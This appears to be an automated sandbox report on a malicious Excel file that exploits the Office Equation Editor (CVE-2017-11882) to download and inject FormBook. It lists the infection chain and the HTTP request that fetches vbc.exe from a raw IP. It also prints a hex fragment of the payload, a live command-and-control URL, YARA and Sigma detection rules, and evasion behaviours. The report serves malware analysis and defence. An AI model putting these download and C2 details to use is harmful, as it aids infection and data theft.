Loading ...

Play interactive tourEdit tour

Windows Analysis Report Swift.xlsx

Overview

General Information

Sample Name:Swift.xlsx
Analysis ID:502159
MD5:9a43d5d2ffc56e823280ca84f6bb870f
SHA1:f0945075b44bc2cb2c96b168d47a269eb0d714ce
SHA256:88c07a30074065b292335ae5d4a45f905fa8a6739d3031d2f8236d2d9a27c681
Tags:FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Contains functionality to detect sleep reduction / modifications
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Potential document exploit detected (performs DNS queries)
Contains functionality to record screenshots
PE file contains executable resources (Code or Archives)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Drops PE files to the user directory
Contains functionality to detect sandboxes (mouse cursor move detection)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2068 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1188 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2564 cmdline: 'C:\Users\Public\vbc.exe' MD5: A65B1815177EF9EBA7E5E894BBF65A3C)
      • DpiScaling.exe (PID: 1464 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 8C9DA2E414E713D3DAFF1F18223AE11B)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • Zxsdvph.exe (PID: 2680 cmdline: 'C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe' MD5: A65B1815177EF9EBA7E5E894BBF65A3C)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\hpvdsxZ.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 6 entries

      Sigma Overview

      Exploits:

      barindex
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.222.155, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1188, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1188, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1188, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2564
      Sigma detected: Execution from Suspicious FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1188, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2564

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY
      Source: 7.0.DpiScaling.exe.72480000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 7.2.DpiScaling.exe.72480000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: wntdll.pdb source: DpiScaling.exe
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00409218 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00405AA4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
      Source: global trafficDNS query: name: onedrive.live.com
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 4x nop then pop ebx
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 4x nop then xor eax, eax
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 4x nop then mov edx, eax
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.222.155:80
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.222.155:80

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: www.septemberstockevent200.com/ht08/
      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Oct 2021 15:05:26 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24Last-Modified: Wed, 13 Oct 2021 09:47:27 GMTETag: "f7c00-5ce38d98ee1b4"Accept-Ranges: bytesContent-Length: 1014784Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 f0 09 00 00 88 05 00 00 00 00 00 2c ff 09 00 00 10 00 00 00 00 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 0f 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 0b 00 60 27 00 00 00 e0 0c 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 bc bf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 8c ef 09 00 00 10 00 00 00 f0 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 64 b2 01 00 00 00 0a 00 00 b4 01 00 00 f4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 0d 00 00 00 c0 0b 00 00 00 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 60 27 00 00 00 d0 0b 00 00 28 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 00 0c 00 00 00 00 00 00 d0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 10 0c 00 00 02 00 00 00 d0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 bc bf 00 00 00 20 0c 00 00 c0 00 00 00 d2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 ea 02 00 00 e0 0c 00 00 ea 02 00 00 92 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 00 00 00 00 00 7c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: GET /008008/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.222.155Connection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
      Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
      Source: explorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmpString found in binary or memory: http://java.w
      Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: explorer.exe, 00000008.00000000.637889890.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: explorer.exe, 00000008.00000000.687535121.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
      Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000008.00000000.637889890.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
      Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
      Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
      Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: explorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
      Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
      Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA1488DD.emfJump to behavior
      Source: unknownDNS traffic detected: queries for: onedrive.live.com
      Source: global trafficHTTP traffic detected: GET /008008/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.222.155Connection: Keep-Alive
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0042C3D4 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0042CA18 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00448008 GetKeyboardState,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0043F6B0 OpenClipboard,GlobalAlloc,GlobalFix,EmptyClipboard,SetClipboardData,GlobalUnWire,

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
